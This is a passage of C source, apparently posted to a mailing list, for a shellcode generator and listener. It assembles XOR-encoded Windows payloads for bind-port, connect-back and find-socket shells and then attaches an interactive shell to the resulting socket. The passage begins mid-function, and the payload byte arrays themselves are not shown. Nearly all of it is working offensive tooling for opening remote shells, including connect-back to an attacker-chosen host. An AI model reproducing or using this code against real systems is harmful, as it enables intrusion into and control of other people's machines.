if(tmp<=0||tmp>0xFFFF)
{
printf("[-] Wrong port...\n");
exit(1);
}
printf("[+] Port correct...\n");
fport=htons(tmp);
ri_bind(fport);
}
else if(nargc==1&&atoi(narg1)!=0)
{
if(atoi(narg1)==0||atoi(narg1)>0xFFFF)
{
printf("[-] Wrong port...\n");
exit(1);
}
printf("[+] Port correct...\n");
fport=htons(atoi(narg1));
ri_bind(fport);
}
else
{
ri_usage(narg0);
exit(1);
}
}
//---------------------------------------------------------------------------
void ri_reset(ri_t *ra)
{
ra->a.l=0;
ra->pr=0;
ra->ep=0;
ra->xor=0;
ra->type=0;
ra->twsai=0;
ra->txor=0;
ra->tconn=0;
ra->tfork=0;
ra->taheap=0;
ra->tcheap=0;
ra->trheap=0;
ra->trpeb=0;
return;
}
//---------------------------------------------------------------------------
int ri_option(ri_t *ra,char* option)
{
char *tmp;
unsigned long t;
struct sockaddr_in me;
if(!strcmp(option,"xor"))
ra->txor=1;
else if(!strcmp(option,"aheap"))
ra->taheap=1;
else if(!strcmp(option,"cheap"))
ra->tcheap=1;
else if(!strcmp(option,"rheap"))
ra->trheap=1;
else if(!strcmp(option,"rpeb"))
ra->trpeb=1;
else if(!strcmp(option,"wsai"))
ra->twsai=1;
else if(!strcmp(option,"c"))
ra->tconn=1;
else if(!strcmp(option,"fork"))
ra->tfork=1;
else if(strncmp(option,"bind(",5)==0&&sscanf(option,"bind(%d)",&t)==1)
{
if(t!=0&&t<=0xffff)
{
ra->port=htons(t);
ra->type=bindp;
}
else
{
printf("Wrong bind port...\n");
return 0;
}
}
else
if(strncmp(option,"conn(",5)==0&&(tmp=strrchr(option,','))!=0&&sscanf(tmp,",%d)",&ra->time)==1&&(tmp[0]=0)==0&&(tmp=strrchr(option,','))!=0&&sscanf(tmp,",%d",&t)==1&&(tmp[0]=0)==0&&(tmp[1]=0)==0&&(option=strstr(option,"conn(")))
{
option+=5;
if(ra->time<0xFFFF)
ra->time*=1000;
else
{
printf("Wrong connect back time...\n");
return 0;
}
if(t!=0&&t<=0xffff)
ra->port=htons(t);
else
{
printf("Wrong connect back port...\n");
return 0;
}
if((ra->host=ri_addr(option))==-1)
{
return 0;
}
ra->type=connp;
}
else if(strcmp(option,"find")==0)
{
t=sizeof(struct sockaddr_in);
if(getsockname(ra->sock,(struct sockaddr*)&me,(int*)&t)==-1){
#ifndef _WIN32
struct{unsigned long maxlen;unsigned long len;char *buf;}nb;
ioctl(ra->sock,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&me;
ioctl(ra->sock,(('T'<<8)|144),&nb);
#endif
}
ra->port=me.sin_port;
ra->type=findp;
}
else
return 0;
return 1;
}
//---------------------------------------------------------------------------
int ri_cfg(ri_t *ra,char* base,char* opt,int sock,char* host,ri_b
*prolog,ri_b *epilog,ri_b *xor)
{
unsigned char fbuf[0x1000];
unsigned long t,p,s,l;
struct hostent *hp;
ri_reset(ra);
if(prolog)
ra->pr=prolog;
if(epilog)
ra->ep=epilog;
if(xor)
ra->xor=xor;
if(sock)
ra->sock=sock;
else
{
printf("Wrong socket...\n");
exit(1);
}
if((ra->host=ri_addr(host))==-1)
{
if(sock!=-1)
exit(1);
else
return -1;
}
memset(fbuf,0,sizeof(fbuf));
sprintf(fbuf,base,opt);
l=strlen(fbuf);
p=0;
s=1;
for(t=0;t<l;t++)
{
if(fbuf[t]==',')
{
fbuf[t]=0;
if(!ri_option(ra,&fbuf[p]))
{
printf("[-] ri_cfg() error...\n");
if(sock!=-1)
exit(1);
}
s=1;
p=t+1;
}
else if(strncmp(&fbuf[t],"bind(",5)==0||strncmp(&fbuf[t],"conn(",5)==0)
{
p=t;
s=1;
for(;t<l+4;t++)
{
if(fbuf[t]==')')
{
fbuf[t+1]=0;
if(!ri_option(ra,&fbuf[p]))
{
printf("[-] ri_cfg() error...\n");
if(sock!=-1)
exit(1);
else
return -1;
}
p=t+2;
if(t+1==l)
s=0;
break;
}
if(t>=l)
s=1;
}
}
}
if(s==1)
{
if(!ri_option(ra,&fbuf[p]))
{
printf("[-] ri_cfg() error...\n");
if(sock!=-1)
exit(1);
else
return -1;
}
}
if(ra->type==0)
{
printf("[-] ri_cfg() error...\n");
if(sock!=-1)
exit(1);
else
return -1;
}
return 0;
}
//---------------------------------------------------------------------------
void ri_asm(ri_t *ra)
{
int bpos; //bcont=0x50c03360
unsigned long pgetk,pgetf,pinit,pwsai,pnet1,pnet2,pheap;
unsigned long bgetk=0xa1646756,bgetf=0x56535150;
unsigned short xsize;
unsigned long xpos;
ra->a.l=0;
if(ra->txor)
{
memcpy(ra->a.b+ra->a.l,xorb,sizeof(xorb)-1);
ra->a.l+=sizeof(xorb)-1;
}
if(ra->pr!=0)
{
memcpy(ra->a.b+ra->a.l,ra->pr->b,ra->pr->l);
ra->a.l+=ra->pr->l;
}
if(ra->trpeb)
{
memcpy(ra->a.b+ra->a.l,push_eax,sizeof(push_eax)-1);
ra->a.l+=sizeof(push_eax)-1;
memcpy(ra->a.b+ra->a.l,rpebb,sizeof(rpebb)-1);
ra->a.l+=sizeof(rpebb)-1;
memcpy(ra->a.b+ra->a.l,pop_eax,sizeof(pop_eax)-1);
ra->a.l+=sizeof(pop_eax)-1;
}
if(ra->taheap||ra->tcheap||ra->trheap)
{
memcpy(ra->a.b+ra->a.l,iheapb,sizeof(iheapb)-1);
ra->a.l+=sizeof(iheapb)-1;
}
for(bpos=0;bpos<sizeof(mainb)-1;bpos++)
{
if(*(unsigned long *)&mainb[bpos]==bgetk)
pgetk=(unsigned long)ra->a.b+ra->a.l+bpos;
if(*(unsigned long *)&mainb[bpos]==bgetf)
pgetf=(unsigned long)ra->a.b+ra->a.l+bpos;
}
memcpy(ra->a.b+ra->a.l,mainb,sizeof(mainb)-1);
ra->a.l+=sizeof(mainb)-1;
pinit=(unsigned long)ra->a.b+ra->a.l;
memcpy(ra->a.b+ra->a.l,small,sizeof(small)-1);
ra->a.l+=sizeof(small)-1;
if(ra->ep!=0)
{
memcpy(ra->a.b+ra->a.l,ra->ep->b,ra->ep->l);
ra->a.l+=ra->ep->l;
}
memcpy(ra->a.b+ra->a.l,ep_end,sizeof(ep_end)-1);
ra->a.l+=sizeof(ep_end)-1;
if(ra->twsai||ra->tfork)
{
pwsai=(unsigned long)ra->a.b+ra->a.l;
memcpy(ra->a.b+ra->a.l,wsai,sizeof(wsai)-1);
ra->a.l+=sizeof(wsai)-1;
}
else
{
pwsai=(unsigned long)ra->a.b+ra->a.l;
memcpy(ra->a.b+ra->a.l,no_wsai,sizeof(no_wsai)-1);
ra->a.l+=sizeof(no_wsai)-1;
}
if(ra->type==bindp)
{
pnet1=(unsigned long)ra->a.b+ra->a.l;
for(bpos=sizeof(bindb)-1;bpos>0;bpos--)
{
if(*(unsigned long *)&bindb[bpos]==0xff56f631)
{
pnet2=(unsigned long)ra->a.b+ra->a.l+bpos;
break;
}
}
*(unsigned short *)&bindb[BIND_PORT]=ra->port;
memcpy(ra->a.b+ra->a.l,bindb,sizeof(bindb)-1);
ra->a.l+=sizeof(bindb)-1;
if(ra->tfork)
{
memcpy(ra->a.b+ra->a.l,bfork,sizeof(bfork)-1);
ra->a.l+=sizeof(bfork)-1;
}
else
{
memcpy(ra->a.b+ra->a.l,no_fork,sizeof(no_fork)-1);
ra->a.l+=sizeof(no_fork)-1;
}
}
else if(ra->type==connp)
{
pnet1=(unsigned long)ra->a.b+ra->a.l+sizeof(connectb)-2;
pnet2=(unsigned long)ra->a.b+ra->a.l;
*(unsigned long *)&connectb[CONN_HOST]=ra->host;
*(unsigned short *)&connectb[CONN_PORT]=ra->port;
*(unsigned long *)&connectb[CONN_TIME]=ra->time;
memcpy(ra->a.b+ra->a.l,connectb,sizeof(connectb)-1);
ra->a.l+=sizeof(connectb)-1;
if(ra->tfork)
{
memcpy(ra->a.b+ra->a.l,bfork,sizeof(bfork)-1);
ra->a.l+=sizeof(bfork)-1;
}
else
{
memcpy(ra->a.b+ra->a.l,no_fork,sizeof(no_fork)-1);
ra->a.l+=sizeof(no_fork)-1;
}
}
else if(ra->type==findp)
{
pnet1=(unsigned long)ra->a.b+ra->a.l;
pnet2=(unsigned long)ra->a.b+ra->a.l+sizeof(findb)-2;
*(unsigned short *)&findb[FIND_PORT]=ra->port;
memcpy(ra->a.b+ra->a.l,findb,sizeof(findb)-1);
ra->a.l+=sizeof(findb)-1;
}
else
{
*(unsigned short *)&bindb[BIND_PORT]=htons(8282);
memcpy(ra->a.b+ra->a.l,bindb,sizeof(bindb)-1);
ra->a.l+=sizeof(bindb)-1;
memcpy(ra->a.b+ra->a.l,no_fork,sizeof(no_fork)-1);
ra->a.l+=sizeof(no_fork)-1;
}
pheap=(unsigned long)ra->a.b+ra->a.l;
if(ra->taheap)
{
memcpy(ra->a.b+ra->a.l,aheapb,sizeof(aheapb)-1);
ra->a.l+=sizeof(aheapb)-1;
}
else if(ra->tcheap)
{
memcpy(ra->a.b+ra->a.l,cheapb,sizeof(cheapb)-1);
ra->a.l+=sizeof(cheapb)-1;
}
else if(ra->trheap)
{
memcpy(ra->a.b+ra->a.l,rheapb,sizeof(rheapb)-1);
ra->a.l+=sizeof(rheapb)-1;
}
for(bpos=0;bpos<ra->a.l;bpos++)
{
if(*(unsigned long *)&ra->a.b[bpos]=='KTEG'&&*(unsigned char
*)&ra->a.b[bpos-1]==0xe8)
*(unsigned long *)&ra->a.b[bpos]=pgetk-4-(unsigned
long)&ra->a.b[bpos];
if(*(unsigned long *)&ra->a.b[bpos]=='FTEG'&&*(unsigned char
*)&ra->a.b[bpos-1]==0xe8)
*(unsigned long *)&ra->a.b[bpos]=pgetf-4-(unsigned
long)&ra->a.b[bpos];
if(*(unsigned long *)&ra->a.b[bpos]=='TINI'&&*(unsigned char
*)&ra->a.b[bpos-1]==0xe8)
*(unsigned long *)&ra->a.b[bpos]=pinit-4-(unsigned
long)&ra->a.b[bpos];
if(*(unsigned long *)&ra->a.b[bpos]=='IASW'&&*(unsigned char
*)&ra->a.b[bpos-1]==0xe8)
*(unsigned long *)&ra->a.b[bpos]=pwsai-4-(unsigned
long)&ra->a.b[bpos];
if(*(unsigned long *)&ra->a.b[bpos]=='1TEN'&&*(unsigned char
*)&ra->a.b[bpos-1]==0xe8)
*(unsigned long *)&ra->a.b[bpos]=pnet1-4-(unsigned
long)&ra->a.b[bpos];
if(*(unsigned long *)&ra->a.b[bpos]=='2TEN'&&*(unsigned char
*)&ra->a.b[bpos-1]==0xe8)
*(unsigned long *)&ra->a.b[bpos]=pnet2-4-(unsigned
long)&ra->a.b[bpos];
if(*(unsigned long *)&ra->a.b[bpos]=='PAEH'&&*(unsigned char
*)&ra->a.b[bpos-1]==0xe8)
*(unsigned long *)&ra->a.b[bpos]=pheap-4-(unsigned
long)&ra->a.b[bpos];
}
if(ra->txor)
{
xsize=ra->a.l-sizeof(xorb)+1;
*(unsigned short *)&ra->a.b[XOR_SIZE]=xsize;
xpos=sizeof(xorb)-1;
if(ra->xor)
ra->a.b[XOR_CHAR]=ri_xor(ra,xpos);
else
ra->a.b[XOR_CHAR]=0x99;
for(;xpos<ra->a.l;xpos++)
ra->a.b[xpos]^=ra->a.b[XOR_CHAR];
}
return;
}
//---------------------------------------------------------------------------
void ri_net(ri_t *ra)
{
if(ra->type==bindp&&ra->tconn==1)
{
ra->sock=ri_conn(ra->host,ra->port);
ri_shell(ra->sock);
}
else if(ra->type==connp&&ra->tconn==1)
{
ra->sock=ri_bind(ra->port);
ri_shell(ra->sock);
}
else if(ra->type==findp)
ri_shell(ra->sock);
#ifdef _WIN32
closesocket(ra->sock);
WSACleanup();
#else
close(ra->sock);
#endif
}
//---------------------------------------------------------------------------
#ifndef EXP
#pragma argsused
int main(int argc, char* argv[])
{
#ifdef _WIN32
WSADATA wsa_data;
#endif
int sock;
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0),&wsa_data);
#endif
sock=ri_net_cfg(argc-1,argv[0],argv[1],argv[2]);
ri_shell(sock);
#ifdef _WIN32
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
return 0;
}
//---------------------------------------------------------------------------
#endif
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]